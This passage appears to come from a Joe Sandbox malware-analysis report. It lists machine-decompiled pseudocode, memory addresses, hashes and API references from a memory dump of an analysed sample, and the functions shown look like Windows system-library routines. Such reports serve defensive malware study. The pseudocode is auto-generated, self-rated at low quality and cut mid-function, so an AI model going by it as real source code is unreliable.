					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E328BF24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x329891e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2560f74
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E328A24D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L328A2330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L328A2330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E328A24D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L328A2330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2560f74
										E3291C726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2560f74
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2560f74
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E328BF1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x255f7a8
									_t86 = _t255 + 0x10; // 0x2560f74
									 *0x329891e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x329891e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x329891e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = L328A3C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2560f74
										_t250 = E3291C490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E328BF1DB(_t250);
									_t228 = E328BF1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x2560f74
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}

0x328bee48
0x328bee4a
0x328bee4f
0x328bee54
0x328bee56
0x328bee5b
0x328bee60
0x328bee63
0x328bee66
0x328bee68
0x328bee70
0x328bee73
0x328bee76
0x328bee79
0x328bee80
0x328bee85
0x328bee88
0x00000000
0x328bee8b
0x328bee93
0x328bee98
0x328bee9f
0x328beeac
0x328beeb8
0x328beeb8
0x328beebe
0x328beec6
0x328beec9
0x328beec9
0x328beece
0x328beece
0x328beece
0x328beece
0x328beece
0x328beece
0x328beed3
0x328beed6
0x328beedb
0x328beee0
0x328beee6
0x328beeee
0x328beeee
0x328beef0
0x328beef4
0x328beef6
0x00000000
0x00000000
0x328bf1dc
0x328bf1dc
0x328beefc
0x328beefc
0x328bef01
0x328bef03
0x328bef06
0x328bef09
0x328bef0c
0x328bef0f
0x328bef0f
0x328bef16
0x328bef16
0x328bef1b
0x328bef20
0x328bef26
0x328bef29
0x328bef2c
0x328bef2c
0x328bef36
0x328bef36
0x328bef3b
0x328bef40
0x328bef46
0x328bef4c
0x328bef54
0x328bef57
0x328bef59
0x328bef60
0x328bef63
0x328bef63
0x328bef66
0x328bef69
0x328bef6c
0x328bf113
0x328bf113
0x328bf115
0x328bf122
0x328bf127
0x328bf12b
0x328ffe64
0x328ffe6a
0x328ffe6a
0x00000000
0x328bf12b
0x328bef72
0x328bef74
0x00000000
0x00000000
0x328bef7a
0x328bef7d
0x328bef7d
0x328bef7d
0x328bef81
0x328bf144
0x328bf144
0x328bf14a
0x328ffd20
0x328ffd23
0x328bef90
0x328bef90
0x328bef93
0x328ffd2e
0x328ffd31
0x00000000
0x00000000
0x328ffd37
0x328ffd45
0x328ffd4b
0x328ffd4b
0x328ffd4e
0x00000000
0x00000000
0x00000000
0x328ffd54
0x328ffd3c
0x328ffd3f
0x00000000
0x00000000
0x00000000
0x328ffd3f
0x328bef99
0x328bef99
0x328bef9c
0x328bf1a6
0x328bf1a9
0x00000000
0x00000000
0x00000000
0x328bf1af
0x328befa2
0x328befa2
0x328befa5
0x328befab
0x328befae
0x328befb4
0x328befba
0x328befc0
0x328befc6
0x328befcc
0x328befd8
0x328befde
0x328befe1
0x328befe7
0x328befe9
0x328befec
0x328beff3
0x328beff8
0x328beffa
0x328befff
0x328bf002
0x328bf008
0x328bf00a
0x328bf15d
0x328bf164
0x328bf165
0x328bf168
0x328bf16b
0x328bf16e
0x328bf170
0x00000000
0x00000000
0x328bf176
0x328bf17a
0x328bf1c8
0x328bf1cf
0x328bf1d0
0x328bf1d3
0x00000000
0x328bf1d3
0x328bf17c
0x328bf105
0x328bf105
0x328bf108
0x328bf10a
0x328bf1b7
0x328bf1b7
0x328bf110
0x00000000
0x328bf110
0x328bf010
0x328bf010
0x328bf013
0x328bf0a2
0x328bf0a2
0x328bf0a6
0x328bf186
0x328bf186
0x328bf0ac
0x328bf0b0
0x328ffe56
0x328ffe56
0x328bf103
0x328bf103
0x00000000
0x328bf103
0x328bf0bc
0x328bf0c3
0x328bf0c4
0x328bf0c7
0x328bf0ce
0x328ffe35
0x328ffe35
0x328ffe39
0x00000000
0x00000000
0x328ffe41
0x328ffe41
0x328ffe42
0x328ffe48
0x328ffe51
0x00000000
0x328ffe51
0x328bf0d4
0x328bf0db
0x00000000
0x00000000
0x328bf0e1
0x328bf0e5
0x328bf193
0x328bf199
0x328bf19b
0x00000000
0x00000000
0x328bf0f4
0x328bf0f4
0x328bf0f8
0x328bf0fa
0x328bf0fd
0x328ffe1e
0x328ffe21
0x328ffe24
0x328ffe27
0x328ffe2a
0x328ffe2d
0x328ffe2d
0x328bf0fd
0x00000000
0x328bf0f8
0x328bf0eb
0x328bf0ee
0x328bf0f1
0x00000000
0x328bf0f1
0x328bf01c
0x328bf01f
0x328bf02a
0x328bf02d
0x328bf030
0x328bf034
0x328bf036
0x328bf039
0x328bf045
0x328bf051
0x328bf05a
0x328bf05a
0x328bf05d
0x328bf060
0x328bf062
0x328ffd59
0x328ffd5c
0x00000000
0x00000000
0x328ffd62
0x328ffd66
0x328ffd72
0x328ffd84
0x328ffd8a
0x328ffd8d
0x328ffd90
0x00000000
0x328ffd90
0x328ffd68
0x328ffd6c
0x00000000
0x00000000
0x00000000
0x328bf068
0x328bf068
0x328bf068
0x328bf06d
0x328ffd98
0x328ffda8
0x328ffdae
0x328ffdae
0x328bf073
0x328bf078
0x328bf07a
0x328ffdbf
0x328bf080
0x328bf080
0x328bf080
0x328bf085
0x328bf088
0x328ffde1
0x328ffde4
0x328ffde4
0x328bf08e
0x328bf095
0x328bf09d
0x00000000
0x328bf09d
0x328bf062
0x328ffd29
0x328bf150
0x328bf153
0x00000000
0x00000000
0x00000000
0x328bf155
0x328bef87
0x328bef8a
0x328bf136
0x328bf13c
0x328bf13e
0x00000000
0x00000000
0x00000000
0x328bf13e
0x00000000
0x328bef8a

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89af0d3b4e60d012b418a6c261b37d9915d5df47bb8235aaa2815a74d4f64da9
Instruction ID: 471ed6adde369d201fd922c1dade6c78e871fb21c8e4b4a32d02d6dca37e987b
Opcode Fuzzy Hash: 89af0d3b4e60d012b418a6c261b37d9915d5df47bb8235aaa2815a74d4f64da9
Instruction Fuzzy Hash: 13E1EC79900308DFEB25CFA9D980A9DBBF5BF58304F10492EE85AA7760DB71A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 3296A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3296A0F7
RtlDebugPrintTimes.NTDLL ref: 3296A1AA
RtlDebugPrintTimes.NTDLL ref: 3296A1CE
RtlDebugPrintTimes.NTDLL ref: 3296A1E3

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3a3c2f2477ec2ce7668238ce8cd1932f56c2a46cf8feec543164616673ddff13
Instruction ID: 7e740af41d6c95a7cf9bef70932d1c02bcf1b1ff53ee4b40310e89f6e514c1e4
Opcode Fuzzy Hash: 3a3c2f2477ec2ce7668238ce8cd1932f56c2a46cf8feec543164616673ddff13
Instruction Fuzzy Hash: 1F517B787056129FEB18CE18C8A0A39B7E9FF8E368B15416DD906DB720DB71EC41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 3290EBC0 Relevance: 6.2, APIs: 4, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3290EEED
RtlDebugPrintTimes.NTDLL ref: 3290EF12
RtlDebugPrintTimes.NTDLL ref: 3290EFA4
RtlDebugPrintTimes.NTDLL ref: 3290EFF8

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 7ffc590ff7781bcc0f88dfe4cdbd2221f69c6c5c5afc5cc5e627344da64a73b2
Instruction ID: 607456f42943c7d412196d95ec0be0e46399fe297600d870c0bea723c2e9ff84
Opcode Fuzzy Hash: 7ffc590ff7781bcc0f88dfe4cdbd2221f69c6c5c5afc5cc5e627344da64a73b2
Instruction Fuzzy Hash: 775125B6E0521D9FEB04CF99C844ADDBBB5BF48354F14802AE905AB390DB359941CF94

Uniqueness

Uniqueness Score: -1.00%

Function 328C7A4F Relevance: 6.1, APIs: 4, Instructions: 81
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E328C7A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t35;
				signed int _t40;
				intOrPtr _t42;
				void* _t50;
				intOrPtr* _t55;
				intOrPtr* _t69;
				void* _t73;

				_t63 = __edx;
				_t51 = __ebx;
				_push("true");
				_push(0x3296c840);
				E328E7BE4(__ebx, __edi, __esi);
				_t66 = __ecx;
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t69 =  *0x32985a7c;
				_push(__edx);
				if(_t69 == 0) {
					 *0x329891e0();
					E328CB490(__ecx, __edx,  *__ecx());
					_t55 =  *((intOrPtr*)(_t73 - 0x14));
					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
					_t34 =  *0x32985d38; // 0xdb948fe
					 *(_t73 - 0x30) = _t34;
					__eflags =  *0x329865fc; // 0xfa5b3294
					if(__eflags == 0) {
						_push(0);
						_push("true");
						_push(_t73 - 0x2c);
						_push("true");
						_push(0xffffffff);
						 *(_t73 - 0x1c) = E328D2B20();
						__eflags =  *(_t73 - 0x1c);
						if( *(_t73 - 0x1c) < 0) {
							E328E8AA0(_t55, _t63,  *(_t73 - 0x1c));
						}
						 *0x329865fc =  *(_t73 - 0x2c);
					}
					_t35 =  *0x329865fc; // 0xfa5b3294
					 *(_t73 - 0x20) = _t35;
					_push("true");
					asm("ror eax, cl");
					 *(_t73 - 0x34) =  *(_t73 - 0x30);
					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
					__eflags = _t40;
					 *(_t73 - 0x38) = _t40;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t73 - 0x3c)) = E32948890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x328650b4);
						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
					} else {
						 *0x329891e0( *((intOrPtr*)(_t73 - 0x24)));
						_t42 =  *( *(_t73 - 0x38))();
					}
					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
					return  *((intOrPtr*)(_t73 - 0x28));
				} else {
					 *0x329891e0();
					_t50 =  *_t69();
					 *(_t73 - 4) = 0xfffffffe;
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
					return _t50;
				}
			}

0x328c7a4f
0x328c7a4f
0x328c7a4f
0x328c7a51
0x328c7a56
0x328c7a5b
0x328c7a5d
0x328c7a61
0x328c7a67
0x328c7a6a
0x329047f8
0x32904801
0x32904806
0x3290480d
0x32904810
0x32904813
0x32904818
0x3290481d
0x32904823
0x32904825
0x32904826
0x3290482b
0x3290482c
0x3290482e
0x32904835
0x32904838
0x3290483b
0x32904840
0x32904840
0x32904848
0x32904848
0x3290484d
0x32904852
0x3290485b
0x32904863
0x32904865
0x3290486b
0x3290486b
0x3290486e
0x32904871
0x32904892
0x32904895
0x32904873
0x3290487b
0x32904881
0x32904881
0x32904898
0x3290489e
0x328c7a70
0x328c7a72
0x328c7a7c
0x329048ac
0x329048b6
0x329048c2
0x329048c2

APIs

RtlDebugPrintTimes.NTDLL ref: 328C7A72
BaseThreadInitThunk.KERNEL32 ref: 328C7A7C
RtlDebugPrintTimes.NTDLL ref: 329047F8
RtlDebugPrintTimes.NTDLL ref: 3290487B

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: bc36c4ef1eaf2e16db724ac0ccab4acab1cb5d3440a38e2fbf1178f54c009aac
Instruction ID: fdd969d4e555f66317ebb3c8d72fce67d960873c18d4098201db40ec9c80574a
Opcode Fuzzy Hash: bc36c4ef1eaf2e16db724ac0ccab4acab1cb5d3440a38e2fbf1178f54c009aac
Instruction Fuzzy Hash: 6F314475E45258EFEF04DFA8D844AADBBF0BB48320F14896AE911B7390DB319941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 328958E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E328958E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x3296bd28);
				_push(0x328dad20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x3298b370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E32898120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E328980BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E32898009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				L328D8F40( &_v244, 0, "true");
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L328953C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E32896055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E32896074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E32896179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E328CB490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E328963CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L328A2330(_t268, _t377 + 0x2c);
										E32964407(_t377);
										E328A24D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = E328964F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x32986644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = L328A5D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E328D46E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											L328D8F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											L32896D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											L32896D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - E32896E00;
											if(_t342 == E32896E00) {
												E32896E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
